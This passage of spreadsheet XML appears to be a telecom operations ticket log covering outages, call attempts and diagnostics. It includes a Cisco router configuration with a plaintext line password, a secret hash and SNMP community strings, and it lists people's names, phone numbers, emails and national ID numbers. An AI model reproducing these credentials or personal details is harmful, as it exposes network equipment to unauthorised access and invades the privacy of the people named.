  EDDA6EB3 58195D24 C44CD195 998D1386 086CF0B4 4DBB2F34 95A28244 931E2839
  EA4DD379 D7D6D721 A5F8A2F3 A4D6A9C5 CE7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3310MC
!
DIAGNOSTIC BOOTUP LEVEL MINIMAL
!
SPANNING-TREE EXTEND SYSTEM-ID
!
!
USERNAME GESTIONIP PRIVILEGE 15 SECRET 9 $9$9/RRJMJVYSY11K$XICDY1PP5RR3VQM0BLSMZ8LMII8ZUT9QANU1JDS1CJG
!
REDUNDANCY
 MODE NONE
!
!
VLAN INTERNAL ALLOCATION POLICY ASCENDING
!
!
POLICY-MAP RATE
 CLASS CLASS-DEFAULT
  POLICE CIR 20480000 BC 3840000 BE 7680000
   CONFORM-ACTION TRANSMIT
   EXCEED-ACTION DROP
   VIOLATE-ACTION DROP
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.100.87 255.255.255.255
!
INTERFACE GIGABITETHERNET0/0/0
 DESCRIPTION WAN PRINCIPAL/_/245700120T/_/
 BANDWIDTH 20480
 IP ADDRESS 10.105.35.35 255.255.255.248
 IP NBAR PROTOCOL-DISCOVERY
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/0/1
 DESCRIPTION WAN REDUNDANTE/_/245700189T/_/
 BANDWIDTH 2048
 IP ADDRESS 10.87.163.85 255.255.255.240
 LOAD-INTERVAL 30
 NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/1/0
!
INTERFACE GIGABITETHERNET0/1/1
!
INTERFACE GIGABITETHERNET0/1/2
!
INTERFACE GIGABITETHERNET0/1/3
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 170.15.35.1 255.255.255.0 SECONDARY
 IP ADDRESS 192.168.35.1 255.255.255.0
 IP NBAR PROTOCOL-DISCOVERY
 LOAD-INTERVAL 30
 SERVICE-POLICY INPUT RATE
 SERVICE-POLICY OUTPUT RATE
!
ROUTER OSPF 1
 ROUTER-ID 10.105.35.35
 AREA 304 NSSA
 REDISTRIBUTE CONNECTED ROUTE-MAP CONNECTED
 NETWORK 10.105.35.32 0.0.0.7 AREA 304
 NEIGHBOR 10.105.35.33
!
IP FORWARD-PROTOCOL ND
NO IP HTTP SERVER
IP HTTP AUTHENTICATION LOCAL
NO IP HTTP SECURE-SERVER
IP ROUTE 0.0.0.0 0.0.0.0 10.87.163.81 200 NAME WIMAX
!
!
!
IP PREFIX-LIST CONNECTED SEQ 5 PERMIT 192.168.35.0/24
IP PREFIX-LIST CONNECTED SEQ 10 PERMIT 10.212.100.87/32
IP PREFIX-LIST CONNECTED SEQ 15 PERMIT 170.15.35.0/24
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
ACCESS-LIST 101 REMARK VOIP_SIGN
ACCESS-LIST 101 PERMIT TCP ANY ANY RANGE 2000 2002
ACCESS-LIST 101 PERMIT TCP ANY ANY EQ 1720
ACCESS-LIST 101 PERMIT TCP ANY ANY RANGE 11000 11999
ACCESS-LIST 101 PERMIT UDP ANY ANY EQ 2427
ACCESS-LIST 101 PERMIT TCP ANY ANY EQ 2428
ACCESS-LIST 101 PERMIT UDP ANY ANY EQ 1719
ACCESS-LIST 101 PERMIT UDP ANY ANY EQ 5060
ACCESS-LIST 102 REMARK VOIP_RTP
ACCESS-LIST 102 PERMIT UDP ANY ANY RANGE 16384 32767
!
!
ROUTE-MAP CONNECTED PERMIT 10
 MATCH IP ADDRESS PREFIX-LIST CONNECTED
!
SNMP-SERVER COMMUNITY MON002457D RO
SNMP-SERVER COMMUNITY GENESIS RO
SNMP-SERVER COMMUNITY MON000089D RO
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION 2 AVENIDA 9-25 ZONA 1 SANTA CRUZ DEL QUICHE
!
!
CONTROL-PLANE
!
!
LINE CON 0
 PASSWORD TELGUA
 LOGIN
 TRANSPORT INPUT NONE
 STOPBITS 1
LINE VTY 0 4
 PASSWORD TELGUA
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
!
!
!
!
!
END
CC_FUNDGENESIS_GT_QUICHE_045#</t>
  </si>
  <si>
    <t>GESTION DE ACCESOS F4596979 | CC_FUNDGENESIS_GT_QUICHE_045
¿
LUN 13/06/2022 16:52
NO SE PUDO ENTREGAR A ESTOS DESTINATARIOS O GRUPOS: RAMOS.MARLON@CLARO.COM.GT EL BUZÓN DE CORREO DEL DESTINATARIO ESTÁ LLENO Y NO PUEDE ACEPTAR MENSAJES POR EL MOMENTO. INTENTE REENVIAR EL MENSAJE MÁS TARDE O PÓNGASE EN CONTACTO CON EL DESTINATARIO DIRECTAMENTE.
JONATHAN EDUARDO TEZEN MEJIA
BUENA TARDE ESTIMADO CLIENTE,
   ES UN GUSTO SALUDARLE, EL PRESENTE ES PARA  SOLICITAR DE SU AMABLE APOYO CON GESTIONAR ACCESOS A NUESTRA ÁREA TÉCNICA PARA VERIFICAR SERVICIO,
 F4596979 | CC_FUNDGENESIS_GT_QUICHE_045
AGRADECEMOS BRINDAR FECHA Y HORA DE VISITA
TÉCNICOS:
TECNICO 	IBM	DPI
PEREZ JUAREZ, ALEX ESTUARDO	692947	1930606391401
GONZALEZ JUAREZ, DANY ALEXANDER	580010	1635475481403
EN ESPERA DE SUS COMENTARIOS</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE NARCISO RAMIREZ AL 48998256 INDICA QUE YA ESTA EL PERSONAL TECNICO TRABAJANDO EN SITIO**
-ID 3001030180
**</t>
  </si>
  <si>
    <t>CLIENTE  ELISEO RAMIREZ  58466198 MENCIONA QUE ESTARA GESTIONANDO LOS PERMISOS Y LUEGO RESPONDERA POR CORREO
-ID 2001969199</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 13 DE JUNIO DE 2022 16:59
PARA: JONATHAN EDUARDO TEZEN MEJIA &lt;JONATHAN.TEZENM@CLARO.COM.GT&gt;; VPERALTA@GENESISEMPRESARIAL.COM &lt;VPERALTA@GENESISEMPRESARIAL.COM&gt;; GERENTE.QUICHE@GENESISEMPRESARIAL.COM &lt;GERENTE.QUICHE@GENESISEMPRESARIAL.COM&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: GESTION DE ACCESOS F4596979 | CC_FUNDGENESIS_GT_QUICHE_045
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4596980</t>
  </si>
  <si>
    <t>SE VALIDAN PRUEBAS DE PRIMER NIVEL CON CLIENTE MAITE, INDICA QUE EL EQUIPO ONT HUAWEI MANTIENE UNA LUZ ROJO, SERVICIO NO LEVANTA Y CONFIRMA LOS SIGUIENTES DATOS:
HORARIO. 8 A 12 - 13 A 16 HORAS
PERMISOS: SI, ISAIASHERNANDEZ@GRUPOABARCA.COM, DANIEL@DONCARNITAS.COM
CONTACTO EN SITIO: MAITE DUARTE/MANUEL ESTRADA 42416188/45426202
UBICACION: INTERNET_CARR. AL SALVADOR KM 15.5 ALDEA PUERTA PARADA CENTRO CONVENCIONES CONDADO CONCEPCION LOCAK 18, FRENTE A WALMART</t>
  </si>
  <si>
    <t>F4596989</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A EJECUTIVO SOLICITANDO CONTACTO CON CLIENTE
F4596989 / 22054780 / FLAMENCO HERNANDEZ S.A. DE C.V. / SIN SERVICIO / AM (NO SE INGRESA CON ND CORRECTO YA QUE
MONICA YIREH CASTILLO POON
BUENOS DÍAS MIGUEL,
REFERENTE AL REPORTE REALIZADO PARA LA REVISIÓN DEL E1 22054780 A NOMBRE DE FLAMENCO HERNANDEZ S.A. DE C.V., LE COMENTAMOS QUE SE REALIZÓ EL DIAGNOSTICO, EL SERVICIO SE ENCUENTRA OPERATIVO A NIVEL DE ÚLTIMA MILLA.
SIN EMBARGO, OBSERVAMOS ASOCIADO LA PBX DEL CLIENTE DE MARCA TP-LINK LA CUAL NO ESTA ENVIANDO EL REGISTRANDO A LA CENTRAL, POR LO QUE SOLICITAMOS DE SU AMABLE APOYO CON BRINDARNOS UN NUMERO DE CONTACTO CON CLIENTE EN EL PR PARA REALIZAR PRUEBAS DE REINICIO CON LA PLANTA TELEFÓNICA.
SALUDOS,</t>
  </si>
  <si>
    <t>CLIENTE NOS APOYA CON EL REINICIO DE LA PBX, SE BOTA REGISTRO EN CENTRAL
##LLAMADA DESDE VIVO
  10.165.195.11/32  DIRECT  0    0                 0.0.0.0         VLANIF3093
&lt;SSSASVYRN1D1EID1&gt;PING -VPN IP_PBX 10.165.195.11
  PING 10.165.195.11: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
  --- 10.165.195.11 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
&lt;SSSASVYRN1D1EID1&gt;</t>
  </si>
  <si>
    <t>SE LE EXPLICA LAS PRUEBAS, MIGUEL INDICA QUE ESTARA DANDO SEGUIMIENTO CON EL PERSONAL IT QUE ADMINISTRA LA PLANTA Y CON EL PROVEEDOR DE LA MISMA, A NIVEL DE CLARO NO HAY INCONVENIENTES, CLIENTE DARA SEGUIMIENTO CON EL PROVEEDOR, SE PROCEDE CON EL CIERRE DE CASO</t>
  </si>
  <si>
    <t>F4596994</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOHANA LEON 22319100 NO RESPONDE || SE INTENTARA LUEGO **
ID 2001419927
**</t>
  </si>
  <si>
    <t>F4597001</t>
  </si>
  <si>
    <t xml:space="preserve">
SE ENVIA MAIL AL CLIENTE NOTIFICANDO LA ALARMA
ADICIONAL SE SOLICITA CONFIRMAR UBICACION DEL MISMO, YA QUE AL VALIDAR ID E IP
EN NMIS Y SM APARECEN DIFERNTES DIRECCIONES, ALTA VERAPAZ Y CHQUIMULA RESPECTIVAMENTE
DE: BARBARA ISABEL APARICIO MORALES &lt;BARBARA.APARICIO@CLARO.COM.GT&gt;ENVIADO: VIERNES, 10 DE JUNIO DE 2022 10:00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0466
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL SERVICIO DEL ATM: ATM04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ADICIONAL SOLICITAMOS NOS CONFIRMEN LA UBICACIÓN DEL ATM, YA QUE EN NUESTRO MONITOREO SE INDICA QUE SE ENCUENTRA EN ALTA VERAPAZ, SIN EMBARGO, AL VALIDAR EL ID 47500972T INDICA UBICACIÓN EN CHIQUIMULA.
TICKET: F4597001
ID: 47500972T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM0466
UBICADO EN: ATM 466, BANRURAL JOCOTAN, BARRIO SAN SEBASTIAN, JOCOTAN CHIQUIMULA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4597011</t>
  </si>
  <si>
    <t xml:space="preserve">	WO OPEN                                			11:29:00 A. M.
1/4	NACXHITL BERNARDINO PEREIRA 	87134513	3 HORAS	14:29:00
2/4	MARLON JAIME	88500414	4 HORAS	15:29:00
3/4	NORMAN SELVA                	88561050	5 HORAS	16:29:00
4/4	MARIO HURTADO	88538938	6 HORAS	17:29:00</t>
  </si>
  <si>
    <t>EN GESTION CON TECNICO MILTON SE ENCUENTRA EN CLIENTE VALIDANDO QUE EL CLIENTE TIENE UN EQUIPO SW QUE SE ENCUENTRA APAGADO ES EL QUE LE DA SERVICIO CABLEADO</t>
  </si>
  <si>
    <t>F4597020</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 10 DE JUNIO DE 2022 12:56
PARA: GERSON NICOLAS AJPACAJA PONCIO &lt;GERSON.AJPACAJA@CLARO.COM.GT&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; YOSELIN DAYRIELA MONTES MUNGUIA &lt;YOSELIN.MONTES@HN.ASESOREXTERNOCA.COM&gt;; LISANDRO JOSE QUESADA SANTOS &lt;LISANDRO.QUESADA@HN.ASESOREXTERNOCA.COM&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;
CC: G-NOC HON &lt;NOC@BACCREDOMATIC.HN&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE DE DATOS AFECTADO-MERAKI AGENCIA PRINCIPAL SPS
*-*-*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LISSASNDRO PARA VALIDAR PERSMISOS DE LOS TECNICOS   TEL (504) 2290-3830 EXT 63087, PERO NO SE TIENE RESPUESTA, FALLA PERMACEN EN PC HASTA QUE CLIENTE AUTORICE INGRESO
2001569337
COLA:
NOMBRE: A: 50422903830
NÚMERO: 50422903830
DURACIÓN: 0:00:31
ESTADO: CONECTADA
DETALLES: 50422903830
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 11/06/2022 08:37:10</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22360100 EXT. 3, EXT 63087 RESPONDE SEÑORITA INDICANDO QUE NO SE ENCUENTRA DE TURNO POR LO QUE BRINDA CONTACTO YOSELIN MONTES - 96200916
-ID 2001847422</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LISANDRO 32275527 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001847028</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  LISANDRO  COMENTA QUE AUN NO SE CUENTAN CON LOS ACCESOS, PERO ESTARA RESPONDIENDO CORREO CUANDO YA ESTEN AUTORIZADOS,
2001576309
COLA:
NOMBRE: A: 50432275527
NÚMERO: 50432275527
DURACIÓN: 0:02:33
ESTADO: CONECTADA
DETALLES: 50432275527
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 11/06/2022 09:13:44</t>
  </si>
  <si>
    <t>SE TRATA DE LLAMAR A CLIENTE YOSELIN COMENTA QUE NO SE ENCUNETRA DE TURNO,  BRINDA OTRO CONTACTO DE LISANDRO 32275527 SE ESTARA LLAMANDO PARA VALIDAR PERMISOS DE LOS TECNICOS
2001575248
COLA:
NOMBRE: A: 50496200916
NÚMERO: 50496200916
DURACIÓN: 0:01:55
ESTADO: CONECTADA
DETALLES: 50496200916
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 11/06/2022 09:08:35</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GUSTAVO BALDERRAMOS 99796407 MENCIONA QUE PERSONAL TECNICO SE COMUNICO CON CLIENTE Y CLIENTE LE INFORMO QUE DONDE SE ENCONTRABA NO ERA EL PROBLEMA SI NO QUE ERA LA CENTRAL
TECNICO LE INFORMO QUE NO LLEGARIA PORQUE NECESITABAN REALIZAR ALGUNAS VALIDACIONES (CLIENTE NO BRINDA MAS INFORMACION)
-ID 2001881858</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GUSTAVO BALDERRAMOS 99796407 QUIEN CONFIRMA LA DIRECCION DE PR
UBICACIÓN:AVENIDA CIRCUMBALACION CONTIGUO A USAP SAN PEDRO SULA
-ID 2001850236</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  YOSELIN MONTES - 96200916 MENCIONA QUE NO CUENTA CON LA DIRECCION EXACTA POR LO QUE SOLICITA SE LLAME A GUSTAVO BALDERRAMOS 99796407
-ID 2001848494</t>
  </si>
  <si>
    <t>F4597031</t>
  </si>
  <si>
    <t>ENCARGADO HUGO VASQUEZ 42441984 VALIDA EQUIPOS ENCENDIDOS APLICA REINICIO PERO ENLACE NO LEVANTA...</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ENCARGADO HUGO VASQUEZ 42441984 ACTUALMENTE REALIZANDO PRUEBAS ...</t>
  </si>
  <si>
    <t>F4597064</t>
  </si>
  <si>
    <t xml:space="preserve">
ENLACE CAIDO, JORGE DE MONITOREO DE BANCO AZTECA CONFIRMA QUE SE TIENE BAJONES DE ENERGIA EN SITIO POR LO QUE ES POSIBLE QUE SE TENGA INESTABILIDAD POR EL MISMO PROBLEMA
SE DEJARA EN ESTADO DE PC HASTA QUE EL SERVICIO DE ENERGIA ESTE ESTABLE
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO.
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN ELEKTRADATOS 10.72.215.20
  PING 10.72.215.20: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.72.215.20 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.28.53
DISPLAY IP ROUTING-TABLE VPN-INSTANCE ELEKTRADATOS 10.72.215.20
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : ELEKTRADATOS
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.72.215.16/28  DIRECT  0    0             D   10.72.215.17    VLANIF339			</t>
  </si>
  <si>
    <t>F4597082</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE  MANUEL ORTIZ 25269051 PERO NO CONTESTA, SE INTENTARA EN UNOS INSTANTES
3001117790
COLA:
NOMBRE: A: 0050325269051
NÚMERO: 0050325269051
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DURACIÓN: 0:00:33
DETALLES: 0050325269051
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 14/06/2022 12:39:50
3001118217
COLA:
NOMBRE: A: 0050325269051
NÚMERO: 0050325269051
ESTADO: MARCANDO
DURACIÓN: 0:00:11
DETALLES: 0050325269051
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 14/06/2022 12:40:00</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MANUEL ORTIZ 25269051 RESPONDE SEÑORITA INDICANDO QUE NO SE ENCUENTRA MANUEL ORTIZ POR LO QUE SOLICITA SE LLAME EN 10 MIN
-ID 3001032202</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE MANUEL ORTIZ 25269051  PERO NO SE TIENE RESPUESTA, SE INTENTARA EN UNOS INSTANTES
2001793673
2001793714
2001793871</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MANUEL ORTIZ 25269051 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001982078</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MANUEL ORTIZ 25269051 MENCIONA QUE LAS LLAMADAS ENTRANTES SE ESTAN CORTANDO, SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001040112</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE MANUEL ORTIZ 25269051  INDICA QUE TIENE PROBLEMAS CONN LLAMADAS ENTRANTES- UNICAMENTE USA ESE E1 PARA ENTRANTES. PROBLEMA QUE DETECTO: AL LEVANTAR EL TELEFONO SE CORTA LA LLAMADA.
SE REALIZAN 3 LLAMAAS DE PRUEBA, LAS TRES COMPLETAN- SE HABLA CON USUARIOS E INDICAN LO SIGUIENTE:
RINA BARRERA
-6 BUENAS 1 CORTADA-
JAKLINE
-2 LLAMADAS CORTADAS-
CARLOS.
-7 LLAMAAS CORTADAS-
- ZUMBIDO FUERTE
- RUIDO FUERTE
 ##VIVO</t>
  </si>
  <si>
    <t>F4597085</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE KEREN ESPERANZA SANDOVAL GUTIERREZ AL 5945 9804 SOLICITA QUE SE LE DEVULVA LLAMADA EN 5 MIN YA QUE CONFIRMARA EN LA FISCALIA **
-ID 2001422897
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE KEREN ESPERANZA SANDOVAL GUTIERREZ AL 5945 9804 CONFIRMA SERVICIO ESTABLE Y OPERATIVO  **
-ID 2001429728
**</t>
  </si>
  <si>
    <t>F4597089</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR RENATO RIOS 58064113 MENCIONA QUE DESDE AYER NO CUENTAN CON ENERGIA
-ID 2001459561</t>
  </si>
  <si>
    <t>F4597099</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JORGE MOLINA-42418536   ##CLIENTE VALIDA ##VIVO</t>
  </si>
  <si>
    <t>F4597100</t>
  </si>
  <si>
    <t>CONFIRMAR CON CLIENTE EN 10 MINUTOS-- SE CORTO LLAMADA PERO HARIA OTRA PRUEBA PARA VALIDAR--</t>
  </si>
  <si>
    <t>F4597102</t>
  </si>
  <si>
    <t>SE LLAMO A CLIENTE DOUGLAS Y DIO NUMERO DE JOSE ROSALES 61584100 SE PROCEDE A LLAMAR</t>
  </si>
  <si>
    <t>F4597110</t>
  </si>
  <si>
    <t>-* SE HABLA CON JOSUE CORADO (CLIENTE) INFORMA QUE  TIENE DEMASIADA LATENCIA, ADICIONAL NO TIENE LAS MISMAS CREDENCIALES EL EQUIPO FORTIGATE Y NO PUEDE ACCEDER, SE OFRECE CONFERENCIA CON CNOC, COMENTA QUE NO ESTA PARA PERDER EL TIEMPO CON UNA CONFERENCIA EN DONDE SIEMPRE LE DICEN LO MISMO, SOLICITA UNA SOLUCION INMEDIATA, SE LE INFORMA QUE SE ESCALARÁ Y SE LE DEVOLVERA LA LLAMADA A LA BREVEDAD POSIBLE, MOLESTO CORTA LA LLAMADA -*
-*</t>
  </si>
  <si>
    <t>F4597111</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE AXEL ESTUARDO RECINOS NATARENO, INDICA QUE EL SERVICIO SE ENCUENTRA OPERATIVO, ASUME QUE HUBO UN CORTE DE ENERGIA DEBIDO A QUE FUE REPORTADO POR LO QUE AUTORIZA CIERRE DE CASO.
2001414624
COLA:
NOMBRE: A: 40138806
NÚMERO: 40138806
DURACIÓN: 0:01:27
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 40138806
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 10/06/2022 10:56:36</t>
  </si>
  <si>
    <t xml:space="preserve"> #HERRAMIENTA_UTILIZADA ARK
 PING EXITOSO: NO HAY PERDIDAS DE PAQUETES HACIA LA IP WAN.
PING -M 30 -C 100 -S 100  -Q  -VPN MP_TELEF 10.174.189.248
  PING 10.174.189.248: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.174.189.248 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS</t>
  </si>
  <si>
    <t>F4597117</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ZELIK URIEL RAMIREZ REYES AL 4489 5331 SOLICITA QUE SE LE LLAME EN 5 MIN  YA QUE CONFIRMARA SI CUENTA CON ENERGIA EN SITIO**
-ID 2001424656
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ZELIK URIEL RAMIREZ REYES AL 4489 5331 CONFIRMA QUE NO CUENTAN CON ENERGIA EN SITIO **
-ID 2001427840
**</t>
  </si>
  <si>
    <t>F4597123</t>
  </si>
  <si>
    <t>CLIENTE JOSE INDICA QUE NO RECIBEN LLAMADAS EXTERNAS, AL LLAMAR AL GDN LA LLAMADA COMPLETA Y DA TONO, PERO COMENTA EL CLIENTE QUE EN SUS INSTALACIONES NO SUENA EL TELÉFONO. CLIENTE APOYA VERIFICANDO EQUIPO AETHRA SIN ALARMAS Y REINICIA SU PLANTA PBX NEC, SE REALIZA PRUEBAS PERO LLAMADAS AÚN NO INGRESAN. CLIENTE SOLICITA QUE SE LLAME A SERGIO TRUJILLO 41842222 YA QUE ÉL ES DE LA PBX. ID DE LLAMADA: 2001420760</t>
  </si>
  <si>
    <t>CLIENTE SERGIO TRUJILLO (PROVEEDOR PBX) 41842222 VALIDA QUE YA ESTÁN RECIBIENDO LLAMADAS AL GDN 22268500, INDICA QUE PROCEDERÁ A CONFIGURAR EL IVR EN EL GDN. AUTORIZA EL CIERRE DEL CASO.
ID DE LLAMADA: 2001458777</t>
  </si>
  <si>
    <t>SE HABLA CON SERGIO TRUJILLO 41842222 (PROVEEDOR DE LA PBX)  QUIEN COMENTA QUE YA REVISÓ LA PBX Y EN LAS VERIFICACIONES ENCONTRÓ QUE LAS LLAMADAS A TODOS LOS DID COMPLETAN, ÚNICAMENTE LA LLAMADA AL GDN 22268500 NO COMPLETA, POR LO QUE SOLICITA SE VERIFIQUE SI NO TIENE ALGUN DESVÍO PROGRAMADO.
ID DE LLAMADA: 2001430510</t>
  </si>
  <si>
    <t>SE TIENE EN LINEA A CLIENTE NOE 55239076 UBICANDO EQUIPOS</t>
  </si>
  <si>
    <t>F4597124</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SELVIN ISRAEL FUENTES 4987 2286 SOLICITA QUE SE LE LLAME EN 15 MIN NUEVAMENTE PARA CONFIRMAR SI HAY ENERGIA EN SITIO **
-ID 2001476298
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SELVIN ISRAEL FUENTES 4987 2286 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001460971</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SELVIN ISRAEL FUENTES 49872286  MENCIONA QUE NO CUENTAN CON ENERGIA EN PR
-ID 2001486325</t>
  </si>
  <si>
    <t>F4597128</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. DENIS RODRIGUEZ 87104495  INFORMA QUE LA POLITICA ANTERIOR ESTA BIEN 5 PARA INTRANET Y 15 PARA INTERNET, ACTUALMENTE UNICAMENTE SOLICITA MONITOREO PARA LAS 3:30 PM Y AL FINALIZAR COMPARTIR GRAFICAS DE CONSUMO DE LOS ULTIMOS 7 DIAS COMENTA QUE LE REGRESARAN LA LLAMADA DON MANUEL.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. DENIS RODRIGUEZ 87104495 SOLICITA GRAFICAS DE HOY DESDE LAS 9:00 HRS  Y LUEGO PROCEDER CON EL CIERRE
-ID 2001508920</t>
  </si>
  <si>
    <t>F4597131</t>
  </si>
  <si>
    <t>SE LLAMÓ A PR 49872286 PARA SEGUIMIENTO Y/O VALIDAR EL TEMA DE ENERGÍA ELÉCTRICA EN SECTOR, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE.</t>
  </si>
  <si>
    <t>F4597133</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUZTO OROZCO - 51259264 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001434764 - 2001435317</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUZTO OROZCO - 51259264 MENCIONA QUE NO CUENTAN CON ENERGIA EN PR
-ID 2001445096</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SELVIN ISRAEL 49872286 MENCIONA QUE VALIDARA CON PR POR LO QUE SOLICITA LLAMADA EN 15 MIN
-ID 2001424815</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JUZTO OROZCO - 51259264 MENCIONA QUE ESTARA VALIDANDO CON PR POR LO QUE SOLICITA LLAMADA EN 5 MIN
-ID 2001429812</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SELVIN ISRAEL 49872286 MENCIONA QUE NO ES EL ENCARGADO DE LA FIZCALIA POR LO QUE BRINDA CONTACTO JUZTO OROZCO - 51259264
-ID 2001428308</t>
  </si>
  <si>
    <t>F4597134</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SELVIN ISRAEL 49872286 MENCIONA QUE NO HAY ENERGIA EN PR
-ID 2001428308</t>
  </si>
  <si>
    <t>F4597137</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JUZTO OROZCO - 51259264 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001438239 -  2001438834</t>
  </si>
  <si>
    <t>F4597144</t>
  </si>
  <si>
    <t xml:space="preserve">
